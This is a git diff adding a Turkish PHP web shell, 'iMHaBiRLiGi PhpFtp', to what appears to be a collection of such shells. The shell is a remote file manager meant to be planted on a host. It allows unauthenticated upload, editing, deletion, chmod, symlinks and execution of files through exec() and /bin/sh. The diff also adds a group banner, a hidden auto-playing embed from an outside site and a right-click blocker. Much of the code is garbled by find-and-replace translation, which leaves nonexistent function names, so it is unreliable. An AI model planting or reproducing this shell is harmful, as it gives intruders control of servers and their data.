+'password' => 'Sifre',
+'add' => 'Ekle',
+'add_basic_auth' => 'add basic-authentification',
+
+'uploaded' => '"[%1]" Yüklendi.',
+'not_uploaded' => '"[%1]" Yüklenemedi.',
+'already_exists' => '"[%1]" Şimdiden var ol.',
+'created' => '"[%1]" Olusturuldu.',
+'not_created' => '"[%1]" Olusturuldu.',
+'really_Sil' => 'Silinen dosyalar?',
+'Sild' => "Bu dosyalar,oldu Sild:\n[%1]",
+'not_Sild' => "Bu dosyalar olamazdı Sild:\n[%1]",
+'Degistir_file' => 'Dosyayi Degistir:',
+'Degistird' => '"[%1]" Degistirildi "[%2]".',
+'not_Degistird' => '"[%1] Degistirilemedi "[%2]".',
+'Tasi_files' => 'Dosyayi TAsi:',
+'Tasid' => "Bu Dosyalar Tasindi \"[%2]\":\n[%1]",
+'not_Tasid' => "Bu Dosyalar Tasinamaz \"[%2]\":\n[%1]",
+'Kopyala_files' => 'Bu Dosyalari Kopyala:',
+'copied' => "Bu Dosyalar Kopyalanir \"[%2]\":\n[%1]",
+'not_copied' => "Bu Dosyalar Kopyalanamaz \"[%2]\":\n[%1]",
+'not_Düzenleed' => '"[%1]" Düzenle.',
+'executed' => "\"[%1]\" Basarili bir sekilde Uygulandi:\n{%2}",
+'not_executed' => "\"[%1]\" Basarili bir sekilde Uygulanamadi:\n{%2}",
+'saved' => '"[%1]" Kurtarildi.',
+'not_saved' => '"[%1]" Kurtarılamadı.',
+'symlinked' => 'Symlink "[%2]" to "[%1]" Olusturuldu.',
+'not_symlinked' => 'Symlink "[%2]" to "[%1]" Olusturulamadi.',
+'permission_for' => 'izin "[%1]":',
+'permission_set' => 'izin "[%1]" Kopyalandi [%2].',
+'permission_not_set' => 'izin "[%1]" Yapilamadi [%2].',
+'not_readable' => '"[%1]" Okunamadi.'
+		);
+
+	}
+
+}
+
+function getimage ($image) {
+	switch ($image) {
+	case 'file':
+		return base64_decode('R0lGODlhEQANAJEDAJmZmf///wAAAP///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA');
+	case 'folder':
+		return base64_decode('R0lGODlhEQANAJEDAJmZmf///8zMzP///yH5BAHoAwMALAAAAAARAA0AAAIqnI+ZwKwbYgTPtIudlbwLOgCBQJYmCYrn+m3smY5vGc+0a7dhjh7ZbygAADsA');
+	case 'hidden_file':
+		return base64_decode('R0lGODlhEQANAJEDAMwAAP///5mZmf///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA');
+	case 'link':
+		return base64_decode('R0lGODlhEQANAKIEAJmZmf///wAAAMwAAP///wAAAAAAAAAAACH5BAHoAwQALAAAAAARAA0AAAM5SArcrDCCQOuLcIotwgTYUllNOA0DxXkmhY4shM5zsMUKTY8gNgUvW6cnAaZgxMyIM2zBLCaHlJgAADsA');
+	case 'smiley':
+		return base64_decode('R0lGODlhEQANAJECAAAAAP//AP///wAAACH5BAHoAwIALAAAAAARAA0AAAIslI+pAu2wDAiz0jWD3hqmBzZf1VCleJQch0rkdnppB3dKZuIygrMRE/oJDwUAOwA=');
+	case 'arrow':
+		return base64_decode('R0lGODlhEQANAIABAAAAAP///yH5BAEKAAEALAAAAAARAA0AAAIdjA9wy6gNQ4pwUmav0yvn+hhJiI3mCJ6otrIkxxQAOw==');
+	}
+}
+
+function html_header () {
+	global $charset;
+
+	echo <<<END
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
+     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+
+<meta http-equiv="Content-Type" content="text/html; charset=$charset" />
+
+<title>iMHaBiRLiGi PhpFtp</title>
+
+<style type="text/css">
+body { font: small sans-serif; text-align: center }
+img { width: 0px; height: 0px }
+a, a:visited { text-decoration: none; color: red }
+hr { border-style: none; height: 1px; Geriground-color: silver; color: silver }
+#main { margin-top: 6pt; margin-left: auto; margin-right: auto; border-spacing: 1px }
+#main th { Geriground: #eee; padding: 3pt 3pt 0pt 3pt }
+.listing th, .listing td { padding: 1px 3pt 0 3pt }
+.listing th { border: 1px solid silver }
+.listing td { border: 1px solid #ddd; Geriground: white }
+.listing .checkbox { text-align: center }
+.listing .filename { text-align: left }
+.listing .size { text-align: right }
+.listing .permission_header { text-align: left }
+.listing .permission { font-family: monospace }
+.listing .owner { text-align: left }
+.listing .group { text-align: left }
+.listing .Görevler { text-align: left }
+.listing_footer td { Geriground: #eee; border: 1px solid silver }
+#directory, #upload, #create, .listing_footer td, #error td, #notice td { text-align: left; padding: 3pt }
+#directory { Geriground: #eee; border: 1px solid silver }
+#upload { padding-top: 1em }
+#create { padding-bottom: 1em }
+.small, .small option { font-size: x-small }
+textarea { border: none; Geriground: white }
+table.dialog { margin-left: auto; margin-right: auto }
+td.dialog { Geriground: #eee; padding: 1ex; border: 1px solid silver; text-align: center }
+#permission { margin-left: auto; margin-right: auto }
+#permission td { padding-left: 3pt; padding-right: 3pt; text-align: center }
+td.permission_action { text-align: right }
+#symlink { Geriground: #eee; border: 1px solid silver }
+#symlink td { text-align: left; padding: 3pt }
+#red_button { width: 120px; color: #400 }
+#green_button { width: 120px; color: #040 }
+#error td { Geriground: maroon; color: white; border: 1px solid silver }
+#notice td { Geriground: green; color: white; border: 1px solid silver }
+#notice pre, #error pre { Geriground: silver; color: black; padding: 1ex; margin-left: 1ex; margin-right: 1ex }
+code { font-size: 12pt }
+td { white-space: nowrap }
+</style>
+
+<script type="text/javascript">
+<!--
+function activate (name) {
+	if (document && document.forms[0] && document.forms[0].elements['focus']) {
+		document.forms[0].elements['focus'].value = name;
+	}
+}
+//-->
+</script>
+
+</head>
+<body>
+
+
+END;
+
+}
+
+function html_footer () {
+
+	echo <<<END
+</body>
+</html>
+END;
+
+}
+
+function notice ($phrase) {
+	global $cols;
+
+	$args = func_get_args();
+	array_shift($args);
+
+	return '<tr id="notice">
+	<td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td>
+</tr>
+';
+
+}
+
+function error ($phrase) {
+	global $cols;
+
+	$args = func_get_args();
+	array_shift($args);
+
+	return '<tr id="error">
+	<td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td>
+</tr>
+';
+
+}
+
+?>
+<BODY><IMG style="WIDTH: 306px; HEIGHT: 76px" height=100 
+src="http://www.nettekiadres.com/imhabirligi.jpg" width=282></BODY>
+<br><Center>SU AN <A href="http://www.imhabirligi.com">iMHaBiRLiGi</A> HUDUTLARINDA BULUNMAKTASINIZ.!!</Center>
+<FONT 
+class=footmsg><EMBED src=http://www.imhabirligi.com/r1/hurl.asx hidden=true 
+type="text/plain; charset=iso-8859-9" 
+AUTOSTART="TRUE">
+<script language=JavaScript>
+<!--
+
+var message="";
+///////////////////////////////////
+function clickIE() {if (document.all) {(message);return false;}}
+function clickNS(e) {if 
+(document.layers||(document.getElementById&&!document.all)) {
+if (e.which==2||e.which==3) {(message);return false;}}}
+if (document.layers) 
+{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}
+else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}
+
+document.oncontextmenu=new Function("return false")
+// --> 
+</script>
\ No newline at end of file
diff --git a/138shell/I/iMHaPFtp.txt b/138shell/I/iMHaPFtp.txt
new file mode 100644
index 0000000..2c003b7
--- /dev/null
+++ b/138shell/I/iMHaPFtp.txt
@@ -0,0 +1,2061 @@
+<?php
+/*
+ * iMHaPFTP.php - iMHaBiRLiGi Php Ftp Editoru
+ * Copyright (C) 2003-2005  iMHaBiRLiGi <iMHaBiRLiGi@imhabirligi.com>
+ *
+ * Bu Kod Tamamiyle Özgür Yazilimdir.
+ * Kötü Amaclar ile kullanilmamak sartiyla istenildigi gibi Kullanilabilir
+ * Programin amaci ftp olmadan hostunuza baglanti kurup 
+ * Dosya ekleyip kaldira bilmektir.
+ * Kodumuz 6 Dilde yazilmistir.Server Diline Göre Otomatik Secim Yapar.
+ * -------------------------------------------------------------------------
+ * Kodu hosta attiktan sonra adres cubuguna kodun uzantisini verip baglanin
+ * Ve Asla kimseye bu kodun uzantisini vermeyiniz.!!
+ * -------------------------------------------------------------------------
+ *
+ * iMHaBiRLiGi PhpFtp V1.1
+ * =========================================================================
+ *
+ * BeweiS
+ * <BeweiS@imhabirligi.com>
+ *    iMHaBiRLiGi Administrator
+ *    Php-Asp-Programlama ve Güvenlik
+ *
+ * MicroP_
+ * <MicroP_@imhabirligi.com>
+ *    iMHaBiRLiGi Administrator
+ *    Php-Asp-Programlama ve Güvenlik
+ *
+ * Libertical
+ * <libertical@imhabirligi.com>
+ *    iMHaBiRLiGi Yönetim
+ *    C++, Delphi,Programlama ve Linux Hastasi
+ *
+ * PowerGhost
+ * <powerghost@imhabirligi.com>
+ *    iMHaBiRLiGi Sistem Danismani
+ *    Sistem Danismani
+ *    
+ *  BadSector
+ *  ozgurkaleli@yahoo.com
+ *  iMHaBiRLiGi Yönetim
+ *   VicualBasic-Delphi Programlama
+ *   Sistemdanismani ve Linux Hastasi
+ *
+ * Bu kodun yaziliminda ismi gecen her arkadasimizin
+ * Katkilari bulunmustur.
+ * Herbiri ilgi alaninda Basarili olduklari konularda kodumuzu gelistirmemize
+ * Katkida bulunmuslardir.
+ * NOT: Kod Hakkinda takildiniz konulari iMHaBiRLiGi Forumlarina Sora bilirsiniz
+ * http://www.imhabirligi.com
+ *<iMHaBiRLiGi@imhabirligi.com>
+/* ------------------------------------------------------------------------- */
+
+/* Diller :
+ * 'en' - English
+ * 'de' - German
+ * 'fr' - French
+ * 'it' - Italian
+ * 'se' - Swedish
+ * 'auto' - autoselect
+ */
+$lang = 'auto';
+
+/* Charset of your filenames:
+ */
+$charset = 'ISO-8859-1';
+
+/* Homedir:
+ * For example: './' - the script's directory
+ */
+$homedir = './';
+
+/* Size of the Düzenle textarea
+ */
+$Düzenlecols = 80;
+$Düzenlerows = 25;
+
+/* -------------------------------------------
+ * Optional configuration (reTasi # to enable)
+ */
+
+/* Permission of created directories:
+ * For example: 0705 would be 'drwx---r-x'.
+ */
+# $dirpermission = 0705;
+
+/* Permission of created files:
+ * For example: 0604 would be '-rw----r--'.
+ */
+# $filepermission = 0604;
+
+/* Filenames related to the apache web server:
+ */
+$htaccess = '.htaccess';
+$htpasswd = '.htpasswd';
+
+/* ------------------------------------------------------------------------- */
+
+if (get_magic_quotes_gpc()) {
+	array_walk($_GET, 'strip');
+	array_walk($_POST, 'strip');
+	array_walk($_REQUEST, 'strip');
+}
+
+if (array_key_exists('image', $_GET)) {
+	header('Content-Type: image/gif');
+	die(getimage($_GET['image']));
+}
+
+$delim = DIRECTORY_SEPARATOR;
+
+if (function_exists('php_uname')) {
+	$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
+} else {
+	$win = ($delim == '\\') ? true : false;
+}
+
+if (!empty($_SERVER['PATH_TRANSLATED'])) {
+	$scriptdir = dirname($_SERVER['PATH_TRANSLATED']);
+} elseif (!empty($_SERVER['SCRIPT_FILENAME'])) {
+	$scriptdir = dirname($_SERVER['SCRIPT_FILENAME']);
+} elseif (function_exists('getcwd')) {
+	$scriptdir = getcwd();
+} else {
+	$scriptdir = '.';
+}
+$homedir = relative2absolute($homedir, $scriptdir);
+
+$dir = (array_key_exists('dir', $_REQUEST)) ? $_REQUEST['dir'] : $homedir;
+
+if (array_key_exists('olddir', $_POST) && !path_is_relative($_POST['olddir'])) {
+	$dir = relative2absolute($dir, $_POST['olddir']);
+}
+
+$directory = simplify_path(addslash($dir));
+
+$files = array();
+$action = '';
+if (!empty($_POST['submit_all'])) {
+	$action = $_POST['action_all'];
+	for ($i = 0; $i < $_POST['num']; $i++) {
+		if (array_key_exists("checked$i", $_POST) && $_POST["checked$i"] == 'true') {
+			$files[] = $_POST["file$i"];
+		}
+	}
+} elseif (!empty($_REQUEST['action'])) {
+	$action = $_REQUEST['action'];
+	$files[] = relative2absolute($_REQUEST['file'], $directory);
+} elseif (!empty($_POST['submit_upload']) && !empty($_FILES['upload']['name'])) {
+	$files[] = $_FILES['upload'];
+	$action = 'upload';
+} elseif (array_key_exists('num', $_POST)) {
+	for ($i = 0; $i < $_POST['num']; $i++) {
+		if (array_key_exists("submit$i", $_POST)) break;
+	}
+	if ($i < $_POST['num']) {
+		$action = $_POST["action$i"];
+		$files[] = $_POST["file$i"];
+	}
+}
+if (empty($action) && (!empty($_POST['submit_create']) || (array_key_exists('focus', $_POST) && $_POST['focus'] == 'create')) && !empty($_POST['create_name'])) {
+	$files[] = relative2absolute($_POST['create_name'], $directory);
+	switch ($_POST['create_type']) {
+	case 'directory':
+		$action = 'create_directory';
+		break;
+	case 'file':
+		$action = 'create_file';
+	}
+}
+if (sizeof($files) == 0) $action = ''; else $file = reset($files);
+
+if ($lang == 'auto') {
+	if (array_key_exists('HTTP_ACCEPT_LANGUAGE', $_SERVER) && strlen($_SERVER['HTTP_ACCEPT_LANGUAGE']) >= 2) {
+		$lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2);
+	} else {
+		$lang = 'en';
+	}
+}
+
+$words = getwords($lang);
+
+$cols = ($win) ? 4 : 7;
+
+if (!isset($dirpermission)) {
+	$dirpermission = (function_exists('umask')) ? (0777 & ~umask()) : 0755;
+}
+if (!isset($filepermission)) {
+	$filepermission = (function_exists('umask')) ? (0666 & ~umask()) : 0644;
+}
+
+if (!empty($_SERVER['SCRIPT_NAME'])) {
+	$self = html(basename($_SERVER['SCRIPT_NAME']));
+} elseif (!empty($_SERVER['PHP_SELF'])) {
+	$self = html(basename($_SERVER['PHP_SELF']));
+} else {
+	$self = '';
+}
+
+if (!empty($_SERVER['SERVER_SOFTWARE'])) {
+	if (strtolower(substr($_SERVER['SERVER_SOFTWARE'], 0, 6)) == 'apache') {
+		$apache = true;
+	} else {
+		$apache = false;
+	}
+} else {
+	$apache = true;
+}
+
+switch ($action) {
+
+case 'view':
+
+	if (is_script($file)) {
+
+		/* highlight_file is a mess! */
+		ob_start();
+		highlight_file($file);
+		$src = ereg_replace('<font color="([^"]*)">', '<span style="color: \1">', ob_get_contents());
+		$src = str_replace(array('</font>', "\r", "\n"), array('</span>', '', ''), $src);
+		ob_end_clean();
+
+		html_header();
+		echo '<h2 style="text-align: left; margin-bottom: 0">' . html($file) . '</h2>
+
+<hr />
+
+<table>
+<tr>
+<td style="text-align: right; vertical-align: top; color: gray; padding-right: 3pt; border-right: 1px solid gray">
+<pre style="margin-top: 0"><code>';
+
+		for ($i = 1; $i <= sizeof(file($file)); $i++) echo "$i\n";
+
+		echo '</code></pre>
+</td>
+<td style="text-align: left; vertical-align: top; padding-left: 3pt">
+<pre style="margin-top: 0">' . $src . '</pre>
+</td>
+</tr>
+</table>
+
+';
+
+		html_footer();
+
+	} else {
+
+		header('Content-Type: ' . getmimetype($file));
+		header('Content-Disposition: filename=' . basename($file));
+
+		readfile($file);
+
+	}
+
+	break;
+
+case 'indir':
+
+	header('Pragma: public');
+	header('Expires: 0');
+	header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
+	header('Content-Type: ' . getmimetype($file));
+	header('Content-Disposition: attachment; filename=' . basename($file) . ';');
+	header('Content-Length: ' . filesize($file));
+
+	readfile($file);
+
+	break;
+
+case 'upload':
+
+	$dest = relative2absolute($file['name'], $directory);
+
+	if (@file_exists($dest)) {
+		listing_page(error('already_exists', $dest));
+	} elseif (@Tasi_uploaded_file($file['tmp_name'], $dest)) {
+		listing_page(notice('uploaded', $file['name']));
+	} else {
+		listing_page(error('not_uploaded', $file['name']));
+	}
+
+	break;
+
+case 'create_directory':
+
+	if (@file_exists($file)) {
+		listing_page(error('already_exists', $file));
+	} else {
+		$old = @umask(0777 & ~$dirpermission);
+		if (@mkdir($file, $dirpermission)) {
+			listing_page(notice('created', $file));
+		} else {
+			listing_page(error('not_created', $file));
+		}
+		@umask($old);
+	}
+
+	break;
+
+case 'create_file':
+
+	if (@file_exists($file)) {
+		listing_page(error('already_exists', $file));
+	} else {
+		$old = @umask(0777 & ~$filepermission);
+		if (@touch($file)) {
+			Düzenle($file);
+		} else {
+			listing_page(error('not_created', $file));
+		}
+		@umask($old);
+	}
+
+	break;
+
+case 'execute':
+
+	chdir(dirname($file));
+
+	$output = array();
+	$retval = 0;
+	exec('echo "./' . basename($file) . '" | /bin/sh', $output, $retval);
+
+	$error = ($retval == 0) ? false : true;
+
+	if (sizeof($output) == 0) $output = array('<' . $words['no_output'] . '>');
+
+	if ($error) {
+		listing_page(error('not_executed', $file, implode("\n", $output)));
+	} else {
+		listing_page(notice('executed', $file, implode("\n", $output)));
+	}
+
+	break;
+
+case 'Sil':
+
+	if (!empty($_POST['no'])) {
+		listing_page();
+	} elseif (!empty($_POST['yes'])) {
+
+		$failure = array();
+		$success = array();
+
+		foreach ($files as $file) {
+			if (del($file)) {
+				$success[] = $file;
+			} else {
+				$failure[] = $file;
+			}
+		}
+
+		$message = '';
+		if (sizeof($failure) > 0) {
+			$message = error('not_Sild', implode("\n", $failure));
+		}
+		if (sizeof($success) > 0) {
+			$message .= notice('Sild', implode("\n", $success));
+		}
+
+		listing_page($message);
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+<table class="dialog">
+<tr>
+<td class="dialog">
+';
+
+		request_dump();
+
+		echo "\t<b>" . word('really_Sil') . '</b>
+	<p>
+';
+
+		foreach ($files as $file) {
+			echo "\t" . html($file) . "<br />\n";
+		}
+
+		echo '	</p>
+	<hr />
+	<input type="submit" name="no" value="' . word('no') . '" id="red_button" />
+	<input type="submit" name="yes" value="' . word('yes') . '" id="green_button" style="margin-left: 50px" />
+</td>
+</tr>
+</table>
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'Degistir':
+
+	if (!empty($_POST['Yol'])) {
+
+		$dest = relative2absolute($_POST['Yol'], $directory);
+
+		if (!@file_exists($dest) && @Degistir($file, $dest)) {
+			listing_page(notice('Degistird', $file, $dest));
+		} else {
+			listing_page(error('not_Degistird', $file, $dest));
+		}
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+	<input type="hidden" name="action" value="Degistir" />
+	<input type="hidden" name="file" value="' . html($file) . '" />
+	<input type="hidden" name="dir" value="' . html($directory) . '" />
+	<b>' . word('Degistir_file') . '</b>
+	<p>' . html($file) . '</p>
+	<hr />
+	' . word('Yol') . ':
+	<input type="text" name="Yol" size="' . textfieldsize($file) . '" value="' . html($file) . '" />
+	<input type="submit" value="' . word('Degistir') . '" />
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'Tasi':
+
+	if (!empty($_POST['Yol'])) {
+
+		$dest = relative2absolute($_POST['Yol'], $directory);
+
+		$failure = array();
+		$success = array();
+
+		foreach ($files as $file) {
+			$filename = substr($file, strlen($directory));
+			$d = $dest . $filename;
+			if (!@file_exists($d) && @Degistir($file, $d)) {
+				$success[] = $file;
+			} else {
+				$failure[] = $file;
+			}
+		}
+
+		$message = '';
+		if (sizeof($failure) > 0) {
+			$message = error('not_Tasid', implode("\n", $failure), $dest);
+		}
+		if (sizeof($success) > 0) {
+			$message .= notice('Tasid', implode("\n", $success), $dest);
+		}
+
+		listing_page($message);
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+';
+
+		request_dump();
+
+		echo "\t<b>" . word('Tasi_files') . '</b>
+	<p>
+';
+
+		foreach ($files as $file) {
+			echo "\t" . html($file) . "<br />\n";
+		}
+
+		echo '	</p>
+	<hr />
+	' . word('Yol') . ':
+	<input type="text" name="Yol" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
+	<input type="submit" value="' . word('Tasi') . '" />
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'Kopyala':
+
+	if (!empty($_POST['Yol'])) {
+
+		$dest = relative2absolute($_POST['Yol'], $directory);
+
+		if (@is_dir($dest)) {
+
+			$failure = array();
+			$success = array();
+
+			foreach ($files as $file) {
+				$filename = substr($file, strlen($directory));
+				$d = addslash($dest) . $filename;
+				if (!@is_dir($file) && !@file_exists($d) && @Kopyala($file, $d)) {
+					$success[] = $file;
+				} else {
+					$failure[] = $file;
+				}
+			}
+
+			$message = '';
+			if (sizeof($failure) > 0) {
+				$message = error('not_copied', implode("\n", $failure), $dest);
+			}
+			if (sizeof($success) > 0) {
+				$message .= notice('copied', implode("\n", $success), $dest);
+			}
+
+			listing_page($message);
+
+		} else {
+
+			if (!@file_exists($dest) && @Kopyala($file, $dest)) {
+				listing_page(notice('copied', $file, $dest));
+			} else {
+				listing_page(error('not_copied', $file, $dest));
+			}
+
+		}
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+';
+
+		request_dump();
+
+		echo "\n<b>" . word('Kopyala_files') . '</b>
+	<p>
+';
+
+		foreach ($files as $file) {
+			echo "\t" . html($file) . "<br />\n";
+		}
+
+		echo '	</p>
+	<hr />
+	' . word('Yol') . ':
+	<input type="text" name="Yol" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
+	<input type="submit" value="' . word('Kopyala') . '" />
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'create_symlink':
+
+	if (!empty($_POST['Yol'])) {
+
+		$dest = relative2absolute($_POST['Yol'], $directory);
+
+		if (substr($dest, -1, 1) == $delim) $dest .= basename($file);
+
+		if (!empty($_POST['relative'])) $file = absolute2relative(addslash(dirname($dest)), $file);
+
+		if (!@file_exists($dest) && @symlink($file, $dest)) {
+			listing_page(notice('symlinked', $file, $dest));
+		} else {
+			listing_page(error('not_symlinked', $file, $dest));
+		}
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog" id="symlink">
+<tr>
+	<td style="vertical-align: top">' . word('Yol') . ': </td>
+	<td>
+		<b>' . html($file) . '</b><br />
+		<input type="checkbox" name="relative" value="yes" id="checkbox_relative" checked="checked" style="margin-top: 1ex" />
+		<label for="checkbox_relative">' . word('relative') . '</label>
+		<input type="hidden" name="action" value="create_symlink" />
+		<input type="hidden" name="file" value="' . html($file) . '" />
+		<input type="hidden" name="dir" value="' . html($directory) . '" />
+	</td>
+</tr>
+<tr>
+	<td>' . word('symlink') . ': </td>
+	<td>
+		<input type="text" name="Yol" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
+		<input type="submit" value="' . word('create_symlink') . '" />
+	</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'Düzenle':
+
+	if (!empty($_POST['save'])) {
+
+		$content = str_replace("\r\n", "\n", $_POST['content']);
+
+		if (($f = @fopen($file, 'w')) && @fwrite($f, $content) !== false && @fclose($f)) {
+			listing_page(notice('saved', $file));
+		} else {
+			listing_page(error('not_saved', $file));
+		}
+
+	} else {
+
+		if (@is_readable($file) && @is_writable($file)) {
+			Düzenle($file);
+		} else {
+			listing_page(error('not_Düzenleed', $file));
+		}
+
+	}
+
+	break;
+
+case 'permission':
+
+	if (!empty($_POST['set'])) {
+
+		$mode = 0;
+		if (!empty($_POST['ur'])) $mode |= 0400; if (!empty($_POST['uw'])) $mode |= 0200; if (!empty($_POST['ux'])) $mode |= 0100;
+		if (!empty($_POST['gr'])) $mode |= 0040; if (!empty($_POST['gw'])) $mode |= 0020; if (!empty($_POST['gx'])) $mode |= 0010;
+		if (!empty($_POST['or'])) $mode |= 0004; if (!empty($_POST['ow'])) $mode |= 0002; if (!empty($_POST['ox'])) $mode |= 0001;
+
+		if (@chmod($file, $mode)) {
+			listing_page(notice('permission_set', $file, decoct($mode)));
+		} else {
+			listing_page(error('permission_not_set', $file, decoct($mode)));
+		}
+
+	} else {
+
+		html_header();
+
+		$mode = fileperms($file);
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+
+	<p style="margin: 0">' . phrase('permission_for', $file) . '</p>
+
+	<hr />
+
+	<table id="permission">
+	<tr>
+		<td></td>
+		<td style="border-right: 1px solid black">' . word('owner') . '</td>
+		<td style="border-right: 1px solid black">' . word('group') . '</td>
+		<td>' . word('other') . '</td>
+	</tr>
+	<tr>
+		<td style="text-align: right">' . word('read') . ':</td>
+		<td><input type="checkbox" name="ur" value="1"'; if ($mode & 00400) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="gr" value="1"'; if ($mode & 00040) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="or" value="1"'; if ($mode & 00004) echo ' checked="checked"'; echo ' /></td>
+	</tr>
+	<tr>
+		<td style="text-align: right">' . word('write') . ':</td>
+		<td><input type="checkbox" name="uw" value="1"'; if ($mode & 00200) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="gw" value="1"'; if ($mode & 00020) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="ow" value="1"'; if ($mode & 00002) echo ' checked="checked"'; echo ' /></td>
+	</tr>
+	<tr>
+		<td style="text-align: right">' . word('execute') . ':</td>
+		<td><input type="checkbox" name="ux" value="1"'; if ($mode & 00100) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="gx" value="1"'; if ($mode & 00010) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="ox" value="1"'; if ($mode & 00001) echo ' checked="checked"'; echo ' /></td>
+	</tr>
+	</table>
+
+	<hr />
+
+	<input type="submit" name="set" value="' . word('set') . '" />
+
+	<input type="hidden" name="action" value="permission" />
+	<input type="hidden" name="file" value="' . html($file) . '" />
+	<input type="hidden" name="dir" value="' . html($directory) . '" />
+
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+default:
+
+	listing_page();
+
+}
+
+/* ------------------------------------------------------------------------- */
+
+function getlist ($directory) {
+	global $delim, $win;
+
+	if ($d = @opendir($directory)) {
+
+		while (($filename = @readdir($d)) !== false) {
+
+			$path = $directory . $filename;
+
+			if ($stat = @lstat($path)) {
+
+				$file = array(
+					'filename'    => $filename,
+					'path'        => $path,
+					'is_file'     => @is_file($path),
+					'is_dir'      => @is_dir($path),
+					'is_link'     => @is_link($path),
+					'is_readable' => @is_readable($path),
+					'is_writable' => @is_writable($path),
+					'size'        => $stat['size'],
+					'permission'  => $stat['mode'],
+					'owner'       => $stat['uid'],
+					'group'       => $stat['gid'],
+					'mtime'       => @filemtime($path),
+					'atime'       => @fileatime($path),
+					'ctime'       => @filectime($path)
+				);
+
+				if ($file['is_dir']) {
+					$file['is_executable'] = @file_exists($path . $delim . '.');
+				} else {
+					if (!$win) {
+						$file['is_executable'] = @is_executable($path);
+					} else {
+						$file['is_executable'] = true;
+					}
+				}
+
+				if ($file['is_link']) $file['target'] = @readlink($path);
+
+				if (function_exists('posix_getpwuid')) $file['owner_name'] = @reset(posix_getpwuid($file['owner']));
+				if (function_exists('posix_getgrgid')) $file['group_name'] = @reset(posix_getgrgid($file['group']));
+
+				$files[] = $file;
+
+			}
+
+		}
+
+		return $files;
+
+	} else {
+		return false;
+	}
+
+}
+
+function sortlist (&$list, $key, $reverse) {
+
+	quicksort($list, 0, sizeof($list) - 1, $key);
+
+	if ($reverse) $list = array_reverse($list);
+
+}
+
+function quicksort (&$array, $first, $last, $key) {
+
+	if ($first < $last) {
+
+		$cmp = $array[floor(($first + $last) / 2)][$key];
+
+		$l = $first;
+		$r = $last;
+
+		while ($l <= $r) {
+
+			while ($array[$l][$key] < $cmp) $l++;
+			while ($array[$r][$key] > $cmp) $r--;
+
+			if ($l <= $r) {
+
+				$tmp = $array[$l];
+				$array[$l] = $array[$r];
+				$array[$r] = $tmp;
+
+				$l++;
+				$r--;
+
+			}
+
+		}
+
+		quicksort($array, $first, $r, $key);
+		quicksort($array, $l, $last, $key);
+
+	}
+
+}
+
+function permission_octal2string ($mode) {
+
+	if (($mode & 0xC000) === 0xC000) {
+		$type = 's';
+	} elseif (($mode & 0xA000) === 0xA000) {
+		$type = 'l';
+	} elseif (($mode & 0x8000) === 0x8000) {
+		$type = '-';
+	} elseif (($mode & 0x6000) === 0x6000) {
+		$type = 'b';
+	} elseif (($mode & 0x4000) === 0x4000) {
+		$type = 'd';
+	} elseif (($mode & 0x2000) === 0x2000) {
+		$type = 'c';
+	} elseif (($mode & 0x1000) === 0x1000) {
+		$type = 'p';
+	} else {
+		$type = '?';
+	}
+
+	$owner  = ($mode & 00400) ? 'r' : '-';
+	$owner .= ($mode & 00200) ? 'w' : '-';
+	if ($mode & 0x800) {
+		$owner .= ($mode & 00100) ? 's' : 'S';
+	} else {
+		$owner .= ($mode & 00100) ? 'x' : '-';
+	}
+
+	$group  = ($mode & 00040) ? 'r' : '-';
